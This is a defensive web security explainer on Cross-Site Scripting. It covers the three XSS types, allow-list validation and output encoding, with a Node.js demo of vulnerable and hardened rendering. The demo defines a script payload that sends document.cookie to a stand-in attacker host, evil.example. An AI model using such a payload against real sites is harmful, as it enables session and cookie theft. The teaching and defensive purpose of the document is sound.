Cross-Site Scripting (XSS) is one of the most common, yet most easily fixed, injection attacks faced by e-commerce businesses and many other web applications.
XSS attacks fall into three types:
- Persistent (stored) XSS: the payload is stored on the server side (for example in a comment, review or profile field) and is served to every user who requests the page that displays it.
- Non-persistent (reflected) XSS: the payload is carried in a crafted link to the vulnerable site and is reflected straight back into the response when the victim opens that link.
- DOM-based XSS: the payload never reaches the server; client-side script reads it from a DOM source such as the URL fragment and writes it into the page without encoding.
Precautions to Mitigate XSS Attacks
- Input validation: to prevent XSS, allow-list (white-list) input on the server side wherever possible, restricting each field to alphanumeric characters or, where the field needs them, a small fixed set of special characters. This reduces the attack surface and the potential for bugs. Validation alone is not enough where a field must legitimately accept characters such as <, > or quotes (a comment field, a name like O'Brien), so data must also be encoded for the HTML context it is written into at output time.
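The stored and reflected cases above, and both mitigations, can be reproduced in a few lines of plain Node.js. The following is an added example and not code from the original page: the host names, the search and comment features, the allow-list pattern and the attacker payload are all constructed for illustration, and the "page" is just a string rather than an HTTP response.

```javascript
// Added example, not from the original page: reflected and stored XSS in
// plain Node.js (no framework), each vulnerable rendering beside its hardened
// form. Host names, field rules and the payload are constructed assumptions.

// Constructed attacker payload of the kind a crafted link or comment carries.
const PAYLOAD = '<script>fetch("https://evil.example/?c="+document.cookie)</script>';

// ---- Reflected (non-persistent) XSS: the search term comes from the URL ----

// Vulnerable: the query-string value is concatenated straight into HTML.
function renderSearchVulnerable(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return `<h1>Results for ${q}</h1>`;
}

// ---- Mitigation 1: allow-list validation (the page's advice) ----
// A search term only needs letters, digits and spaces, so reject everything
// else before it goes anywhere near the page. Enforce this server-side.
const SEARCH_ALLOWLIST = /^[A-Za-z0-9 ]{1,64}$/;
function isValidSearch(q) {
  return typeof q === 'string' && SEARCH_ALLOWLIST.test(q);
}

// ---- Mitigation 2: context-aware output encoding ----
// Encoding for an HTML text node. This is the control that still works when a
// field must legitimately accept "<", ">" or quotes.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened search: validate first, and encode anyway (defence in depth).
function renderSearchHardened(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  if (!isValidSearch(q)) return '<h1>Invalid search term</h1>';
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// ---- Stored (persistent) XSS: comments are saved and replayed to everyone ----
// Comments legitimately contain apostrophes and angle brackets, so an
// alphanumeric allow-list would break the feature; encoding at output is what
// neutralises a stored payload.
function createCommentStore() {
  const comments = []; // in-memory stand-in for a database table
  return {
    post(text) { comments.push(text); },
    // Vulnerable: stored text is echoed unencoded on every page load.
    renderVulnerable() {
      return '<ul>' + comments.map((c) => `<li>${c}</li>`).join('') + '</ul>';
    },
    // Hardened: the same data, encoded for the HTML context at render time.
    renderHardened() {
      return '<ul>' + comments.map((c) => `<li>${escapeHtml(c)}</li>`).join('') + '</ul>';
    },
  };
}

// Crude check used in the walk-through: does the rendered page contain a
// script element the browser would execute?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Walk-through: a crafted link and a poisoned comment against both versions.
function runDemo() {
  const link = 'https://shop.example/search?q=' + encodeURIComponent(PAYLOAD);
  const store = createCommentStore();
  store.post("O'Brien: I <3 this shop"); // legitimate comment with special chars
  store.post(PAYLOAD);                   // attacker's stored payload
  return {
    reflectedVulnerable: containsScriptTag(renderSearchVulnerable(link)), // true
    reflectedHardened: containsScriptTag(renderSearchHardened(link)),     // false
    storedVulnerable: containsScriptTag(store.renderVulnerable()),        // true
    storedHardened: containsScriptTag(store.renderHardened()),            // false
  };
}

console.log(runDemo());
```

The encoder is specific to HTML text and attribute values; data written into a JavaScript string, a URL or a CSS value needs the encoding rules of that context instead, which is why the allow-list is worth keeping as a first line of defence even where encoding is in place.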
More detailed steps can be found here.